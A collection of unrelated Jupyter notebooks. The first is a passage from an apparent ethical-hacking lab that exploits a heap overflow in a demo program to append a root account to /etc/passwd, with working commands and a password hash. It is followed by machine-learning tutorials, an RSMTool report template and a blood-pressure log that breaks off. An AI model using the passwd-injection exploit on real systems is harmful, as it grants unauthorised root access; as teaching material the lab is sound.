ofstream fout; (gdb) n (gdb) n (gdb) p/x secret # secret is a pointer $1 = 0x8051bb0 (gdb) p/x secret_file # secret file is a pointer $2 = 0x8051c20 (gdb) ``` ``` # the offset of secret_file from secret buffer is: print(0x8051c20 - 0x8051bb0) ! ./secret.exe $(python -c 'print("A"*112)') # let's make sure testfile doesn't exist in the current director # delete the file if exists #! rm -f testfile ! ls -al testfile ! ./secret.exe $(python -c 'print("A"*112 + "testfile")') %%bash ls -al testfile %%bash echo kali | sudo -S cat testfile ``` ## Exploit the heap overflow flaw - several clever ways to exploit this type of capability - One interesting one: append a user account to the `/etc/passwd` file - make a backup copy of the file just incase... ``` %%bash cp /etc/passwd /tmp/passwd.bkup %%bash cat /tmp/passwd.bkup ``` ## /etc/passwd file format - Linux `/etc/passwd` file stores user account infor and hashed password using the following format: `username:password:userid:groupid:User Info:home folder:default shell` - x : hashed password stored in /etc/shadow file - NOTE: the password field can also contain hashed password - Python crypt module provides API to create Unix passwords with hash - [https://docs.python.org/3/library/crypt.html](https://docs.python.org/3/library/crypt.html) ```python crypt("password", "salt") ``` ``` %%bash python -c 'import crypt; print(crypt.crypt("password", "AA"))' %%bash python -c 'import crypt; print(crypt.crypt("password", "XX"))' ``` ## goal: generate a string that looks like `username:XXq2wKiyI43A2:0:0:userinfo:/root:/bin/bash` ### problem: - it's hard to generate the exact line ending with `/bin/bash` - because the file name `/etc/passwd` will be automatically attached at the end - remember we're writing the whole string as a secret note to the file ### workaround: - make `/etc/passwd` a soft link pointing to `/bin/bash` - create the following string instead: `username:XXq2wKiyI43A2:0:0:userinfo:/root:/tmp/etc/passwd` - Note `/etc/passwd` must be over_written to the `secret_file` buffer ``` %%bash mkdir /tmp/etc ln -s /bin/bash /tmp/etc/passwd %%bash ls -l /tmp/etc/passwd ``` ### now we can create a valid password entry that looks like: `hacker1:XXq2wKiyI43A2:0:0:me:/root:/tmp/etc/passwd` #### things to note - the value just before `/etc/passwd` must be 112 bytes long, remember? - can play with user information column to adjust the length ``` %%bash # find the length with empty user info python -c 'print("hacker1:XXq2wKiyI43A2:0:0::/root:/tmp", end="")' %%bash # find the length with empty user info python -c 'print("hacker1:XXq2wKiyI43A2:0:0::/root:/tmp", end="")' | wc -c 112-37 %%bash python -c 'print("hacker1:XXq2wKiyI43A2:0:0:" + "A"*75 + ":/root:/tmp", end="")' | wc -c ! ./secret.exe $(python -c 'print("hacker1:XXq2wKiyI43A2:0:0:" + "A"*75 + ":/root:/tmp/etc/passwd", end="")') %%bash echo kali | sudo -S tail /etc/passwd ``` ## login or su - use newly created account (`hacker1:password`) to login ```bash ┌──(kali㉿K)-[~/projects/EthicalHacking/demos/heap_overflow] └─$ su hacker1 134 ⨯ Password: ┌──(root💀K)-[/home/kali/projects/EthicalHacking/demos/heap_overflow] └─# whomai ```
github_jupyter
<img src="https://upload.wikimedia.org/wikipedia/en/a/a1/Visma_logo.jpg" align="right" width="30%" alt="Visma logo"> Semi supervised learning (Still under development!) ============= <img src="http://www.rm.dk/siteassets/regional-udvikling/digitalisering/dabai/dabai-logo.png" align="right" width="20%" alt="DABAI logo"> The first set of methods cover the principals from the following summary: http://sci2s.ugr.es/ssl A batch-generative method, consisting of Kmeans and Logistic Regression, is implemented to cover a naive approach. This experiment is compared to a baseline whice consists of only Logistic Regression. ``` %run -i initilization.py from pyspark.sql import functions as F from pyspark.ml import clustering from pyspark.ml import feature from pyspark.sql import DataFrame from pyspark.sql import Window from pyspark.ml import Pipeline from pyspark.ml import classification from pyspark.ml.evaluation import BinaryClassificationEvaluator from pyspark.ml.tuning import ParamGridBuilder, CrossValidator from shared import Plot2DGraphs, create_dummy_data from semisupervised import batch_generative_model ``` ##### Add some parameters in order to generate a dataset ``` mean_1 = [3.0, 3.0] std_1 = [2, 2] mean_2 = [-3.0, -3.0] std_2 = [1. , 1.0] n_1 = 300 n_2 = 300 n = [n_1, n_2] mean = [mean_1, mean_2] std = [std_1, std_2] ``` ### An initial method to semi supervised learning The following cells are ment to be a data creation method along with an initial try on generate model for semi supervised learning. ``` def compute_error_rate(data_frame, truth_label='real_label', found_label='prediction'): """ """ df_stats = (data_frame .groupBy([truth_label, found_label]) .agg(F.count('prediction').alias('Prediction Count')) ) n = (df_stats .select(F.sum(F.col('Prediction Count')).alias('n')) .collect()[0]['n'] ) wrong_guess = (df_stats .filter((F.col(truth_label) != F.col(found_label))) .select(F.sum(F.col('Prediction Count')).alias('errors')) .collect()[0]['errors'] ) df_stats.show() print(n) print(wrong_guess) print('Error-rate: {}'.format(wrong_guess/n)) ``` ###### Create the labled dataset, and with 1% used lables and the rest is set to NAN. ``` tester = create_dummy_data.create_labeled_data_with_clusters(n, mean, std, 0.01) df_tester = spark.createDataFrame(tester) ``` The dataset with lables and available lables plotted ``` Plot2DGraphs.plot_known_and_unknown_data(tester) ``` ###### The initial try at classifying the data, using logistic regression ``` df_train = df_tester.filter((F.col('used_label') != np.NaN)) df_test = df_tester.filter((F.col('used_label') == np.NaN)) vec_assembler = feature.VectorAssembler( inputCols=['x','y'], outputCol='features') lg = classification.LogisticRegression( featuresCol=vec_assembler.getOutputCol(), labelCol='used_label') pipeline = Pipeline(stages=[vec_assembler, lg]) # CrossValidation gets build here! param_grid = (ParamGridBuilder() .addGrid(lg.regParam, [0.1, 0.01]) .build() ) evaluator = BinaryClassificationEvaluator( rawPredictionCol=lg.getRawPredictionCol(), labelCol=lg.getLabelCol()) cross_validator = CrossValidator( estimator=pipeline, estimatorParamMaps=param_grid, evaluator=evaluator, numFolds=3) cross_validator_model = cross_validator.fit(df_train) df_without_semisupervised = cross_validator_model.transform(df_test) Plot2DGraphs.plot_known_and_unknown_data( df_without_semisupervised.toPandas(), labelCol='prediction') compute_error_rate(df_without_semisupervised) ``` ##### Lets take a look at the semi supervised approach This simplifyed version uses KMeans and Logistic Regression. In the future, the obvious thing to do is either create a user active system or use an ensembled approach ``` df_output = batch_generative_model.semi_supervised_batch_single_classifier_generate_approach(df_tester,['x','y']) df_output.limit(5).toPandas() compute_error_rate(df_output) Plot2DGraphs.plot_known_and_unknown_data(df_output.toPandas(), labelCol='prediction') df = spark.read.parquet('/home/svanhmic/workspace/data/DABAI/sparkdata/parquet/double_helix.parquet/') df.write.csv('/home/svanhmic/workspace/data/DABAI/sparkdata/csv/double_helix.csv/') ```
github_jupyter
# Using EMI-FastGRNN on the HAR Dataset This is a very simple example of how the existing EMI-FastGRNN implementation can be used on the HAR dataset. We illustrate how to train a model that predicts on 48 step sequence in place of the 128 length baselines while attempting to predict early. For more advanced use cases which involves more sophisticated computation graphs or loss functions, please refer to the doc strings provided with the released code. In the preprint of our work, we use the terms *bag* and *instance* to refer to the RNN input sequence of original length and the shorter ones we want to learn to predict on, respectively. In the code though, *bag* is replaced with *instance* and *instance* is replaced with *sub-instance*. We will use the term *instance* and *sub-instance* interchangeably. The network used here is a simple RNN + Linear classifier network. The UCI [Human Activity Recognition](https://archive.ics.uci.edu/ml/datasets/human+activity+recognition+using+smartphones) dataset. ``` from __future__ import print_function import os import sys import tensorflow as tf import numpy as np sys.path.insert(0, '../../') os.environ['CUDA_VISIBLE_DEVICES'] ='1' # FastGRNN and FastRNN imports from edgeml.graph.rnn import EMI_DataPipeline from edgeml.graph.rnn import EMI_FastGRNN from edgeml.graph.rnn import EMI_FastRNN from edgeml.trainer.emirnnTrainer import EMI_Trainer, EMI_Driver import edgeml.utils ``` Let us set up some network parameters for the computation graph. ``` # Network parameters for our FastGRNN + FC Layer NUM_HIDDEN = 16 NUM_TIMESTEPS = 48 NUM_FEATS = 9 FORGET_BIAS = 1.0 NUM_OUTPUT = 6 USE_DROPOUT = False KEEP_PROB = 0.9 # Non-linearities can be chosen among "tanh, sigmoid, relu, quantTanh, quantSigm" UPDATE_NL = "quantTanh" GATE_NL = "quantSigm" # Ranks of Parameter matrices for low-rank parameterisation to compress models. WRANK = 5 URANK = 6 # For dataset API PREFETCH_NUM = 5 BATCH_SIZE = 32 # Number of epochs in *one iteration* NUM_EPOCHS = 3 # Number of iterations in *one round*. After each iteration, # the model is dumped to disk. At the end of the current # round, the best model among all the dumped models in the # current round is picked up.. NUM_ITER = 4 # A round consists of multiple training iterations and a belief # update step using the best model from all of these iterations NUM_ROUNDS = 10 # A staging direcory to store models MODEL_PREFIX = '/tmp/models/model-fgrnn' ``` # Loading Data Please make sure the data is preprocessed to a format that is compatible with EMI-RNN. `tf/examples/EMI-RNN/fetch_har.py` can be used to download and setup the HAR dataset. ``` # Loading the data x_train, y_train = np.load('./HAR/48_16/x_train.npy'), np.load('./HAR/48_16/y_train.npy') x_test, y_test = np.load('./HAR/48_16/x_test.npy'), np.load('./HAR/48_16/y_test.npy') x_val, y_val = np.load('./HAR/48_16/x_val.npy'), np.load('./HAR/48_16/y_val.npy') # BAG_TEST, BAG_TRAIN, BAG_VAL represent bag_level labels. These are used for the label update # step of EMI/MI RNN BAG_TEST = np.argmax(y_test[:, 0, :], axis=1) BAG_TRAIN = np.argmax(y_train[:, 0, :], axis=1) BAG_VAL = np.argmax(y_val[:, 0, :], axis=1) NUM_SUBINSTANCE = x_train.shape[1] print("x_train shape is:", x_train.shape) print("y_train shape is:", y_train.shape) print("x_test shape is:", x_val.shape) print("y_test shape is:", y_val.shape) ``` # Computation Graph ![hell](img/3PartsGraph.png) The *EMI-RNN* computation graph is constructed out of the following three mutually disjoint parts ('modules'): 1. `EMI_DataPipeline`: An efficient data input pipeline that using the Tensorflow Dataset API. This module ingests data compatible with EMI-RNN and provides two iterators for a batch of input data, $x$ and label $y$. 2. `EMI_RNN`: The 'abstract' `EMI-RNN` class defines the methods and attributes required for the forward computation graph. An implementation based on FastGRNN - `EMI_FastGRNN` is used in this document, though the user is free to implement his own computation graphs compatible with `EMI-RNN`. This module expects two Dataset API iterators for $x$-batch and $y$-batch as inputs and constructs the forward computation graph based on them. Every implementation of this class defines an `output` operation - the output of the forward computation graph. 3. `EMI_Trainer`: An instance of `EMI_Trainer` class which defines the loss functions and the training routine. This expects an `output` operator from an `EMI-RNN` implementation and attaches loss functions and training routines to it. To build the computation graph, we create an instance of all the above and then connect them together. Note that, the `EMI_FastGRNN` class is an implementation that uses an FastGRNN cell and pushes the FastGRNN output at each step to a secondary classifier for classification. This secondary classifier is not implemented as part of `EMI_FastGRNN` and is left to the user to define by overriding the `createExtendedGraph` method, and the `restoreExtendedgraph` method. For the purpose of this example, we will be using a simple linear layer as a secondary classifier. ``` # Define the linear secondary classifier def createExtendedGraph(self, baseOutput, *args, **kwargs): W1 = tf.Variable(np.random.normal(size=[NUM_HIDDEN, NUM_OUTPUT]).astype('float32'), name='W1') B1 = tf.Variable(np.random.normal(size=[NUM_OUTPUT]).astype('float32'), name='B1') y_cap = tf.add(tf.tensordot(baseOutput, W1, axes=1), B1, name='y_cap_tata') self.output = y_cap self.graphCreated = True def restoreExtendedGraph(self, graph, *args, **kwargs): y_cap = graph.get_tensor_by_name('y_cap_tata:0') self.output = y_cap self.graphCreated = True def feedDictFunc(self, keep_prob=None, inference=False, **kwargs): if inference is False: feedDict = {self._emiGraph.keep_prob: keep_prob} else: feedDict = {self._emiGraph.keep_prob: 1.0} return feedDict EMI_FastGRNN._createExtendedGraph = createExtendedGraph EMI_FastGRNN._restoreExtendedGraph = restoreExtendedGraph if USE_DROPOUT is True: EMI_FastGRNN.feedDictFunc = feedDictFunc inputPipeline = EMI_DataPipeline(NUM_SUBINSTANCE, NUM_TIMESTEPS, NUM_FEATS, NUM_OUTPUT) emiFastGRNN = EMI_FastGRNN(NUM_SUBINSTANCE, NUM_HIDDEN, NUM_TIMESTEPS, NUM_FEATS, wRank=WRANK, uRank=URANK, gate_non_linearity=GATE_NL, update_non_linearity=UPDATE_NL, useDropout=USE_DROPOUT) emiTrainer = EMI_Trainer(NUM_TIMESTEPS, NUM_OUTPUT, lossType='xentropy') ``` Now that we have all the elementary parts of the computation graph setup, we connect them together to form the forward graph. ``` tf.reset_default_graph() g1 = tf.Graph() with g1.as_default(): # Obtain the iterators to each batch of the data x_batch, y_batch = inputPipeline() # Create the forward computation graph based on the iterators y_cap = emiFastGRNN(x_batch) # Create loss graphs and training routines emiTrainer(y_cap, y_batch) ``` # EMI Driver The `EMI_Driver` implements the `EMI_RNN` algorithm. For more information on how the driver works, please refer to `tf/docs/EMI-RNN.md`. Note that, during the training period, the accuracy printed is instance level accuracy with the current label information as target. Bag level accuracy, with which we are actually concerned, is calculated after the training ends. ``` with g1.as_default(): emiDriver = EMI_Driver(inputPipeline, emiFastGRNN, emiTrainer) emiDriver.initializeSession(g1) y_updated, modelStats = emiDriver.run(numClasses=NUM_OUTPUT, x_train=x_train, y_train=y_train, bag_train=BAG_TRAIN, x_val=x_val, y_val=y_val, bag_val=BAG_VAL, numIter=NUM_ITER, keep_prob=KEEP_PROB, numRounds=NUM_ROUNDS, batchSize=BATCH_SIZE, numEpochs=NUM_EPOCHS, modelPrefix=MODEL_PREFIX, fracEMI=0.5, updatePolicy='top-k', k=1) ``` # Evaluating the trained model ![MIML Formulation illustration](img/MIML_illustration.png) ## Accuracy Since the trained model predicts on a smaller 48-step input while our test data has labels for 128 step inputs (i.e. bag level labels), evaluating the accuracy of the trained model is not straight forward. We perform the evaluation as follows: 1. Divide the test data also into sub-instances; similar to what was done for the train data. 2. Obtain sub-instance level predictions for each bag in the test data. 3. Obtain bag level predictions from sub-instance level predictions. For this, we use our estimate of the length of the signature to estimate the expected number of sub-instances that would be non negative - $k$ illustrated in the figure. If a bag has $k$ consecutive sub-instances with the same label, that becomes the label of the bag. All other bags are labeled negative. 4. Compare the predicted bag level labels with the known bag level labels in test data. ## Early Savings Early prediction is accomplished by defining an early prediction policy method. This method receives the prediction at each step of the learned FastGRNN for a sub-instance as input and is expected to return a predicted class and the 0-indexed step at which it made this prediction. This is illustrated below in code. ``` # Early Prediction Policy: We make an early prediction based on the predicted classes # probability. If the predicted class probability > minProb at some step, we make # a prediction at that step. def earlyPolicy_minProb(instanceOut, minProb, **kwargs): assert instanceOut.ndim == 2 classes = np.argmax(instanceOut, axis=1) prob = np.max(instanceOut, axis=1) index = np.where(prob >= minProb)[0] if len(index) == 0: assert (len(instanceOut) - 1) == (len(classes) - 1) return classes[-1], len(instanceOut) - 1 index = index[0] return classes[index], index def getEarlySaving(predictionStep, numTimeSteps, returnTotal=False): predictionStep = predictionStep + 1 predictionStep = np.reshape(predictionStep, -1) totalSteps = np.sum(predictionStep) maxSteps = len(predictionStep) * numTimeSteps savings = 1.0 - (totalSteps / maxSteps) if returnTotal: return savings, totalSteps return savings k = 2 predictions, predictionStep = emiDriver.getInstancePredictions(x_test, y_test, earlyPolicy_minProb, minProb=0.99) bagPredictions = emiDriver.getBagPredictions(predictions, minSubsequenceLen=k, numClass=NUM_OUTPUT) print('Accuracy at k = %d: %f' % (k, np.mean((bagPredictions == BAG_TEST).astype(int)))) print('Additional savings: %f' % getEarlySaving(predictionStep, NUM_TIMESTEPS)) # A slightly more detailed analysis method is provided. df = emiDriver.analyseModel(predictions, BAG_TEST, NUM_SUBINSTANCE, NUM_OUTPUT) ``` ## Picking the best model The `EMI_Driver.run()` method, upon finishing, returns a list containing information about the best models after each EMI-RNN round. This can be used to identify the best model (based on validation accuracy) at the end of each round - illustrated below. ``` devnull = open(os.devnull, 'r') for val in modelStats: round_, acc, modelPrefix, globalStep = val emiDriver.loadSavedGraphToNewSession(modelPrefix, globalStep, redirFile=devnull) predictions, predictionStep = emiDriver.getInstancePredictions(x_test, y_test, earlyPolicy_minProb, minProb=0.99, keep_prob=1.0) bagPredictions = emiDriver.getBagPredictions(predictions, minSubsequenceLen=k, numClass=NUM_OUTPUT) print("Round: %2d, Validation accuracy: %.4f" % (round_, acc), end='') print(', Test Accuracy (k = %d): %f, ' % (k, np.mean((bagPredictions == BAG_TEST).astype(int))), end='') print('Additional savings: %f' % getEarlySaving(predictionStep, NUM_TIMESTEPS)) ```
github_jupyter
``` # Setting options for the plots %matplotlib inline %config InlineBackend.figure_formats={'retina', 'svg'} %config InlineBackend.rc={'savefig.dpi': 150} ``` # Experiment Report ``` import itertools import math import os import re import pickle import platform import time import warnings from functools import partial from os.path import abspath, relpath, exists, join import numpy as np import pandas as pd import seaborn as sns import scipy.stats as stats import statsmodels.api as sm from matplotlib import pyplot as plt from textwrap import wrap # allow older versions of pandas to work try: from pandas.io.common import DtypeWarning except ImportError: from pandas.errors import DtypeWarning from IPython import sys_info from IPython.display import display, HTML, Image, Javascript, Markdown, SVG from rsmtool.reader import DataReader from rsmtool.writer import DataWriter from rsmtool.utils.files import parse_json_with_comments from rsmtool.utils.notebook import (float_format_func, int_or_float_format_func, compute_subgroup_plot_params, bold_highlighter, color_highlighter, show_thumbnail) from rsmtool.fairness_utils import (get_fairness_analyses, write_fairness_results) from rsmtool.version import VERSION as rsmtool_version sns.set_context('notebook') rsm_report_dir = os.environ.get('RSM_REPORT_DIR', None) if rsm_report_dir is None: rsm_report_dir = os.getcwd() rsm_environ_config = join(rsm_report_dir, '.environ.json') if not exists(rsm_environ_config): raise FileNotFoundError('The file {} cannot be located. ' 'Please make sure that either (1) ' 'you have set the correct directory with the `RSM_REPORT_DIR` ' 'environment variable, or (2) that your `.environ.json` ' 'file is in the same directory as your notebook.'.format(rsm_environ_config)) environ_config = parse_json_with_comments(rsm_environ_config) ``` <style type="text/css"> div.prompt.output_prompt { color: white; } span.highlight_color { color: red; } span.highlight_bold { font-weight: bold; } @media print { @page { size: landscape; margin: 0cm 0cm 0cm 0cm; } * { margin: 0px; padding: 0px; } #toc { display: none; } span.highlight_color, span.highlight_bold { font-weight: bolder; text-decoration: underline; } div.prompt.output_prompt { display: none; } h3#Python-packages, div#packages { display: none; } </style> ``` # NOTE: you will need to set the following manually # if you are using this notebook interactively. experiment_id = environ_config.get('EXPERIMENT_ID') description = environ_config.get('DESCRIPTION') context = environ_config.get('CONTEXT') train_file_location = environ_config.get('TRAIN_FILE_LOCATION') test_file_location = environ_config.get('TEST_FILE_LOCATION') output_dir = environ_config.get('OUTPUT_DIR') figure_dir = environ_config.get('FIGURE_DIR') model_name = environ_config.get('MODEL_NAME') model_type = environ_config.get('MODEL_TYPE') skll_fixed_parameters = environ_config.get('SKLL_FIXED_PARAMETERS') skll_objective = environ_config.get('SKLL_OBJECTIVE') file_format = environ_config.get('FILE_FORMAT') length_column = environ_config.get('LENGTH_COLUMN') second_human_score_column = environ_config.get('H2_COLUMN') use_scaled_predictions = environ_config.get('SCALED') min_score = environ_config.get("MIN_SCORE") max_score = environ_config.get("MAX_SCORE") standardize_features = environ_config.get('STANDARDIZE_FEATURES') exclude_zero_scores = environ_config.get('EXCLUDE_ZEROS') feature_subset_file = environ_config.get('FEATURE_SUBSET_FILE', ' ') min_items = environ_config.get('MIN_ITEMS') use_thumbnails = environ_config.get('USE_THUMBNAILS') predict_expected_scores = environ_config.get('PREDICT_EXPECTED_SCORES') rater_error_variance = environ_config.get("RATER_ERROR_VARIANCE") # groups for analysis by prompt or subgroup. groups_desc = environ_config.get('GROUPS_FOR_DESCRIPTIVES') groups_eval = environ_config.get('GROUPS_FOR_EVALUATIONS') # min number of n for group to be displayed in the report min_n_per_group = environ_config.get('MIN_N_PER_GROUP') if min_n_per_group is None: min_n_per_group = {} # javascript path javascript_path = environ_config.get("JAVASCRIPT_PATH") # initialize counter for thumbnail IDs id_generator = itertools.count(1) with open(join(javascript_path, "sort.js"), "r", encoding="utf-8") as sortf: display(Javascript(data=sortf.read())) Markdown('''This report presents the analysis for **{}**: {}'''.format(experiment_id, description)) markdown_str = '' if use_thumbnails: markdown_str += ("""\n - Images in this report have been converted to """ """clickable thumbnails.""") if predict_expected_scores: markdown_str += ("""\n - Predictions analyzed in this report are *expected scores*, """ """i.e., probability-weighted averages over all score points.""") if markdown_str: markdown_str = '**Notes**:' + markdown_str display(Markdown(markdown_str)) HTML(time.strftime('%c')) %%html <div id="toc"></div> # Read in the training and testing features, both raw and pre-processed # Make sure that the `spkitemid` and `candidate` columns are read as strings # to preserve any leading zeros # We filter DtypeWarnings that pop up mostly in very large files string_columns = ['spkitemid', 'candidate'] converter_dict = {column: str for column in string_columns} with warnings.catch_warnings(): warnings.filterwarnings('ignore', category=DtypeWarning) if exists(train_file_location): df_train_orig = DataReader.read_from_file(train_file_location) train_file = join(output_dir, '{}_train_features.{}'.format(experiment_id, file_format)) if exists(train_file): df_train = DataReader.read_from_file(train_file, converters=converter_dict) train_metadata_file = join(output_dir, '{}_train_metadata.{}'.format(experiment_id, file_format)) if exists(train_metadata_file): df_train_metadata = DataReader.read_from_file(train_metadata_file, converters=converter_dict) train_other_columns_file = join(output_dir, '{}_train_other_columns.{}'.format(experiment_id, file_format)) if exists(train_other_columns_file): df_train_other_columns = DataReader.read_from_file(train_other_columns_file, converters=converter_dict) train_length_file = join(output_dir, '{}_train_response_lengths.{}'.format(experiment_id, file_format)) if exists(train_length_file): df_train_length = DataReader.read_from_file(train_length_file, converters=converter_dict) train_excluded_file = join(output_dir, '{}_train_excluded_responses.{}'.format(experiment_id, file_format)) if exists(train_excluded_file): df_train_excluded = DataReader.read_from_file(train_excluded_file, converters=converter_dict) train_responses_with_excluded_flags_file = join(output_dir, '{}_train_responses_with_excluded_flags.{}'.format(experiment_id, file_format)) if exists(train_responses_with_excluded_flags_file): df_train_responses_with_excluded_flags = DataReader.read_from_file(train_responses_with_excluded_flags_file, converters=converter_dict) train_preproc_file = join(output_dir, '{}_train_preprocessed_features.{}'.format(experiment_id, file_format)) if exists(train_preproc_file): df_train_preproc = DataReader.read_from_file(train_preproc_file, converters=converter_dict) if exists(test_file_location): df_test_orig = DataReader.read_from_file(test_file_location) test_file = join(output_dir, '{}_test_features.{}'.format(experiment_id, file_format)) if exists(test_file): df_test = DataReader.read_from_file(test_file, converters=converter_dict) test_metadata_file = join(output_dir, '{}_test_metadata.{}'.format(experiment_id, file_format)) if exists(test_metadata_file): df_test_metadata = DataReader.read_from_file(test_metadata_file, converters=converter_dict) test_other_columns_file = join(output_dir, '{}_test_other_columns.{}'.format(experiment_id, file_format)) if exists(test_other_columns_file): df_test_other_columns = DataReader.read_from_file(test_other_columns_file, converters=converter_dict) test_human_scores_file = join(output_dir, '{}_test_human_scores.{}'.format(experiment_id, file_format)) if exists(test_human_scores_file): df_test_human_scores = DataReader.read_from_file(test_human_scores_file, converters=converter_dict) test_excluded_file = join(output_dir, '{}_test_excluded_responses.{}'.format(experiment_id, file_format)) if exists(test_excluded_file): df_test_excluded = DataReader.read_from_file(test_excluded_file, converters=converter_dict) test_responses_with_excluded_flags_file = join(output_dir, '{}_test_responses_with_excluded_flags.{}'.format(experiment_id, file_format)) if exists(test_responses_with_excluded_flags_file): df_test_responses_with_excluded_flags = DataReader.read_from_file(test_responses_with_excluded_flags_file, converters=converter_dict) test_preproc_file = join(output_dir, '{}_test_preprocessed_features.{}'.format(experiment_id, file_format)) if exists(test_preproc_file): df_test_preproc = DataReader.read_from_file(test_preproc_file, converters=converter_dict) pred_preproc_file = join(output_dir, '{}_pred_processed.{}'.format(experiment_id, file_format)) if exists(pred_preproc_file): df_pred_preproc = DataReader.read_from_file(pred_preproc_file, converters=converter_dict) feature_file = join(output_dir, '{}_feature.{}'.format(experiment_id, file_format)) if exists(feature_file): df_features = DataReader.read_from_file(feature_file, converters=converter_dict) features_used = [c for c in df_features.feature.values] # compute the longest feature name: we'll need if for the plots longest_feature_name = max(map(len, features_used)) betas_file = join(output_dir, '{}_betas.{}'.format(experiment_id, file_format)) if exists(betas_file): df_betas = DataReader.read_from_file(betas_file) if exists(feature_subset_file): df_feature_subset_specs = DataReader.read_from_file(feature_subset_file) else: df_feature_subset_specs = None # check for continuous human scores in the evaluation set continuous_human_score = False if exists(pred_preproc_file): if not df_pred_preproc['sc1'].equals(np.round(df_pred_preproc['sc1'])): continuous_human_score = True ```
github_jupyter
``` import pandas as pd from matplotlib import pyplot as plt df = pd.DataFrame(columns=["time", "sys", "dia", "rate"], data=[ # [ "2018-12-27 04:19", 158, 80, 60 ], # [ "2018-12-27 04:20", 131, 80, 60 ], # 05 Jan 2018 [ "2019-01-05 19:00", 152, 69, 62 ], [ "2019-01-05 19:50", 156, 69, 64 ], [ "2019-01-05 20:43", 158, 71, 63 ], [ "2019-01-05 21:45", 150, 59, 62 ], [ "2019-01-05 23:00", 149, 74, 62 ], [ "2019-01-05 23:00", 161, 68, 61 ], [ "2019-01-05 23:30", 155, 76, 62 ], [ "2019-01-05 23:30", 148, 72, 64 ], [ "2019-01-06 00:14", 151, 76, 55 ], [ "2019-01-06 00:14", 150, 77, 64 ], [ "2019-01-06 00:55", 178, 79, 64 ], [ "2019-01-06 00:55", 170, 77, 67 ], [ "2019-01-06 01:41", 131, 61, 60 ], # auto [ "2019-01-06 06:22", 131, 80, 60 ], [ "2019-01-06 06:24", 152, 79, 58 ], [ "2019-01-06 07:35", 173, 77, 58 ], [ "2019-01-06 11:14", 156, 71, 57 ], [ "2019-01-06 11:33", 138, 74, 59 ], [ "2019-01-06 12:38", 136, 74, 63 ], [ "2019-01-06 13:30", 123, 61, 61 ], [ "2019-01-06 15:16", 119, 65, 64 ], [ "2019-01-06 16:05", 93, 60, 61 ], [ "2019-01-06 16:07", 123, 71, 61 ], [ "2019-01-06 18:10", 109, 61, 58 ], [ "2019-01-06 22:01", 136, 69, 62 ], [ "2019-01-07 00:06", 112, 73, 53 ], [ "2019-01-07 00:08", 114, 60, 62 ], [ "2019-01-07 00:50", 101, 59, 60 ], [ "2019-01-07 00:51", 125, 56, 62 ], [ "2019-01-07 04:02", 108, 65, 64 ], [ "2019-01-07 07:07", 110, 53, 61 ], [ "2019-01-07 07:08", 119, 59, 62 ], [ "2019-01-07 10:05", 135, 67, 58 ], [ "2019-01-07 11:32", 137, 66, 60 ], [ "2019-01-07 12:37", 108, 59, 58 ], [ "2019-01-07 14:07", 149, 76, 67 ], [ "2019-01-07 14:33", 148, 73, 64 ], [ "2019-01-07 14:49", 144, 72, 59 ], [ "2019-01-07 15:51", 158, 81, 62 ], [ "2019-01-07 16:16", 120, 87, 60 ], [ "2019-01-07 18:47", 134, 70, 63 ], [ "2019-01-07 19:38", 138, 68, 69 ], [ "2019-01-07 20:59", 128, 62, 62 ], [ "2019-01-07 22:04", 136, 70, 60 ], [ "2019-01-07 22:05", 136, 70, 60 ], [ "2019-01-07 22:06", 145, 66, 60 ], [ "2019-01-07 23:09", 169, 89, 63 ], [ "2019-01-07 23:33", 159, 84, 61 ], [ "2019-01-08 00:06", 155, 82, 61 ], [ "2019-01-08 01:59", 131, 73, 66 ], [ "2019-01-08 03:05", 117, 74, 68 ], [ "2019-01-08 03:06", 128, 72, 67 ], [ "2019-01-08 03:08", 141, 72, 66 ], [ "2019-01-08 03:09", 140, 75, 64 ], [ "2019-01-08 03:13", 150, 81, 64 ], [ "2019-01-08 04:44", 106, 65, 70 ], [ "2019-01-08 07:12", 154, 72, 62 ], [ "2019-01-08 07:14", 148, 78, 65 ], [ "2019-01-08 08:42", 145, 75, 68 ], [ "2019-01-08 10:19", 133, 76, 67 ], [ "2019-01-08 13:33", 149, 79, 64 ], [ "2019-01-08 16:53", 133, 70, 65 ], [ "2019-01-08 21:22", 144, 86, 58 ], [ "2019-01-09 03:15", 132, 70, 71 ], [ "2019-01-09 07:06", 115, 67, 70 ], [ "2019-01-09 11:26", 120, 70, 66 ], [ "2019-01-09 17:54", 144, 72, 70 ], [ "2019-01-09 19:20", 135, 65, 65 ], [ "2019-01-09 19:20", 135, 65, 65 ], [ "2019-01-10 00:23", 128, 70, 63 ], [ "2019-01-10 02:19", 108, 53, 61 ], [ "2019-01-10 06:50", 130, 67, 62 ], [ "2019-01-10 10:28", 138, 72, 63 ], # 10 jan [ "2019-01-10 13:35", 120, 62, 64 ], [ "2019-01-10 21:20", 134, 71, 65 ], # 11 jan [ "2019-01-11 00:55", 126, 71, 67 ], [ "2019-01-11 03:27", 101, 65, 65 ], [ "2019-01-11 07:08", 120, 69, 63 ], [ "2019-01-11 12:27", 112, 58, 62 ], [ "2019-01-11 15:08", 107, 62, 63 ], # 12 jan [ "2019-01-12 01:00", 100, 60, 71 ], [ "2019-01-12 07:10", 140, 69, 59 ], [ "2019-01-12 07:10", 132, 69, 57 ], [ "2019-01-12 10:10", 103, 65, 68 ], [ "2019-01-12 18:16", 111, 65, 61 ], [ "2019-01-12 22:10", 121, 75, 67 ], # 13 jan [ "2019-01-13 01:27", 130, 66, 63 ], [ "2019-01-13 05:36", 109, 62, 65 ], [ "2019-01-13 13:04", 137, 71, 66 ], # 14 jan [ "2019-01-14 01:19", 107, 62, 65 ], [ "2019-01-14 07:10", 97, 65, 63 ], [ "2019-01-14 10:50", 105, 62, 67 ], [ "2019-01-14 13:12", 128, 68, 64 ], # event: new treatment schedule [ "2019-01-14 15:06", 105, 53, 60 ], [ "2019-01-14 19:31", 129, 69, 63 ], [ "2019-01-14 21:06", 116, 62, 63 ], # 15 jan [ "2019-01-15 09:00", 117, 60, 64 ], [ "2019-01-15 12:00", 112, 58, 65 ], [ "2019-01-15 15:05", 100, 56, 67 ], [ "2019-01-15 18:05", 119, 61, 65 ], [ "2019-01-15 21:00", 119, 62, 63 ], # 16 jan [ "2019-01-16 00:12", 125, 70, 61 ], [ "2019-01-16 00:28", 111, 65, 60 ], [ "2019-01-15 09:00", 133, 67, 60 ], [ "2019-01-15 12:00", 122, 59, 60 ], [ "2019-01-15 15:00", 111, 66, 64 ], [ "2019-01-15 18:00", 118, 68, 64 ], [ "2019-01-15 21:52", 119, 50, 61 ], # 17 Jan [ "2019-01-17 00:03", 109, 59, 64 ], [ "2019-01-17 03:00", 90, 55, 67 ], [ "2019-01-17 03:03", 109, 